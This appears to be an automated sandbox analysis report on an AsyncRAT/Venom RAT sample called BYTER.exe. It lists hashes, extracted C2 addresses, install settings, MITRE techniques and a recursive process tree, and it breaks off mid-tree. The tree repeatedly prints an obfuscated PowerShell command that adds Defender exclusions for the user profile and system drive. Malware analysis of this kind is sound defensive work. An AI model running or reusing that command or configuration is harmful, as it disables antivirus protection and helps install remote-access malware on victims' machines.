asyncrat | ceb87fb8fc18a0699bac5b532cfdad64cfdf755efccb03b2571679460b465724

Analysis

max time kernel
3s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
09/01/2025, 01:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BYTER.exe
Size

13.3MB
MD5

9fd8d6a471d60fbf60d029504916ea50
SHA1

e1cb6de275494b2642a88a0b2136b1ec84551947
SHA256

ceb87fb8fc18a0699bac5b532cfdad64cfdf755efccb03b2571679460b465724
SHA512

c80968a9e7ecd6c31a4dcc5a27cd47260d0bc2601312b3b3a250487bea64e63595c062c9f48358fd477609a4bfcdd82bfca1da8689b3c247ce62d3fbfb409f7b
SSDEEP

393216:0tk1FrHQc/l+FvxWBqWwVrCCIIedFQMG9:0tkPHQG+FJAqWwVCCI/Du

Score

10^/10

asyncrat default defense_evasion discovery rat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

10.0.2.15:9090

10.0.2.15:52033

147.185.221.19:9090

147.185.221.19:52033

Mutex

yigdzohbebyxyvvzbc

Attributes

delay
1
install
true
install_file
Steam.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x001c00000002aaca-5.dat	family_asyncrat

Executes dropped EXE 6 IoCs

pid	Process
240	MAIN.exe
5932	MAIN.exe
2972	MAIN.exe
5028	MAIN.exe
2764	MAIN.exe
2260	MAIN.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BYTER.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BYTER.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BYTER.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BYTER.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BYTER.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BYTER.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BYTER.exe

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
3004	timeout.exe
5384	timeout.exe
3500	timeout.exe
4672	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2784	schtasks.exe
756	schtasks.exe
3044	schtasks.exe
1072	schtasks.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
5280	powershell.exe
5508	powershell.exe
6092	powershell.exe
5280	powershell.exe
5488	powershell.exe
5508	powershell.exe
6092	powershell.exe
2540	powershell.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe
240	MAIN.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	240	MAIN.exe
Token: SeDebugPrivilege	5280	powershell.exe
Token: SeDebugPrivilege	5932	MAIN.exe
Token: SeDebugPrivilege	5508	powershell.exe
Token: SeDebugPrivilege	2972	MAIN.exe
Token: SeDebugPrivilege	6092	powershell.exe
Token: SeDebugPrivilege	5028	MAIN.exe
Token: SeDebugPrivilege	5488	powershell.exe
Token: SeDebugPrivilege	2764	MAIN.exe
Token: SeDebugPrivilege	2540	powershell.exe
Token: SeDebugPrivilege	2260	MAIN.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 2908 wrote to memory of 5280	2908	BYTER.exe	77
PID 2908 wrote to memory of 5280	2908	BYTER.exe	77
PID 2908 wrote to memory of 5280	2908	BYTER.exe	77
PID 2908 wrote to memory of 2968	2908	BYTER.exe	79
PID 2908 wrote to memory of 2968	2908	BYTER.exe	79
PID 2908 wrote to memory of 2968	2908	BYTER.exe	79
PID 2908 wrote to memory of 240	2908	BYTER.exe	80
PID 2908 wrote to memory of 240	2908	BYTER.exe	80
PID 2968 wrote to memory of 5508	2968	BYTER.exe	81
PID 2968 wrote to memory of 5508	2968	BYTER.exe	81
PID 2968 wrote to memory of 5508	2968	BYTER.exe	81
PID 2968 wrote to memory of 5160	2968	BYTER.exe	83
PID 2968 wrote to memory of 5160	2968	BYTER.exe	83
PID 2968 wrote to memory of 5160	2968	BYTER.exe	83
PID 2968 wrote to memory of 5932	2968	BYTER.exe	84
PID 2968 wrote to memory of 5932	2968	BYTER.exe	84
PID 5160 wrote to memory of 6092	5160	BYTER.exe	85
PID 5160 wrote to memory of 6092	5160	BYTER.exe	85
PID 5160 wrote to memory of 6092	5160	BYTER.exe	85
PID 5160 wrote to memory of 5512	5160	BYTER.exe	87
PID 5160 wrote to memory of 5512	5160	BYTER.exe	87
PID 5160 wrote to memory of 5512	5160	BYTER.exe	87
PID 5160 wrote to memory of 2972	5160	BYTER.exe	88
PID 5160 wrote to memory of 2972	5160	BYTER.exe	88
PID 5512 wrote to memory of 5488	5512	BYTER.exe	89
PID 5512 wrote to memory of 5488	5512	BYTER.exe	89
PID 5512 wrote to memory of 5488	5512	BYTER.exe	89
PID 5512 wrote to memory of 3328	5512	BYTER.exe	91
PID 5512 wrote to memory of 3328	5512	BYTER.exe	91
PID 5512 wrote to memory of 3328	5512	BYTER.exe	91
PID 5512 wrote to memory of 5028	5512	BYTER.exe	92
PID 5512 wrote to memory of 5028	5512	BYTER.exe	92
PID 3328 wrote to memory of 2540	3328	BYTER.exe	93
PID 3328 wrote to memory of 2540	3328	BYTER.exe	93
PID 3328 wrote to memory of 2540	3328	BYTER.exe	93
PID 3328 wrote to memory of 1592	3328	BYTER.exe	95
PID 3328 wrote to memory of 1592	3328	BYTER.exe	95
PID 3328 wrote to memory of 1592	3328	BYTER.exe	95
PID 3328 wrote to memory of 2764	3328	BYTER.exe	96
PID 3328 wrote to memory of 2764	3328	BYTER.exe	96
PID 1592 wrote to memory of 3136	1592	BYTER.exe	97
PID 1592 wrote to memory of 3136	1592	BYTER.exe	97
PID 1592 wrote to memory of 3136	1592	BYTER.exe	97
PID 1592 wrote to memory of 2248	1592	BYTER.exe	98
PID 1592 wrote to memory of 2248	1592	BYTER.exe	98
PID 1592 wrote to memory of 2248	1592	BYTER.exe	98
PID 1592 wrote to memory of 2260	1592	BYTER.exe	181
PID 1592 wrote to memory of 2260	1592	BYTER.exe	181

C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2908
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5280
- C:\Users\Admin\AppData\Local\Temp\BYTER.exe
  "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2968
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5508
- - C:\Users\Admin\AppData\Local\Temp\BYTER.exe
    "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5160
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6092
  - - C:\Users\Admin\AppData\Local\Temp\BYTER.exe
      "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5512
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5488
    - - C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3328
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2540
      - C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1592
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        7⤵
        
        PID:3136
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        8⤵
        
        PID:908
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        8⤵
        
        PID:6052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        9⤵
        
        PID:5236
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        9⤵
        
        PID:3952
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        10⤵
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        10⤵
        
        PID:5868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        11⤵
        
        PID:5588
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        11⤵
        
        PID:788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        12⤵
        
        PID:3768
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        12⤵
        
        PID:5704
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        13⤵
        
        PID:5152
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        13⤵
        
        PID:228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        14⤵
        
        PID:3448
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        14⤵
        
        PID:3968
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        15⤵
        
        PID:1384
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        15⤵
        
        PID:2796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        16⤵
        
        PID:1292
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        16⤵
        
        PID:456
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        17⤵
        
        PID:3308
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        17⤵
        
        PID:5436
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        18⤵
        
        PID:5740
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        18⤵
        
        PID:6132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        19⤵
        
        PID:6016
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        19⤵
        
        PID:5528
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        20⤵
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        20⤵
        
        PID:3140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        21⤵
        
        PID:5988
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        21⤵
        
        PID:2268
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        22⤵
        
        PID:3960
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        22⤵
        
        PID:2260
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        23⤵
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        23⤵
        
        PID:5060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
        24⤵
        
        PID:5432
        
        C:\Users\Admin\AppData\Local\Temp\BYTER.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
        24⤵
        
        PID:5508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
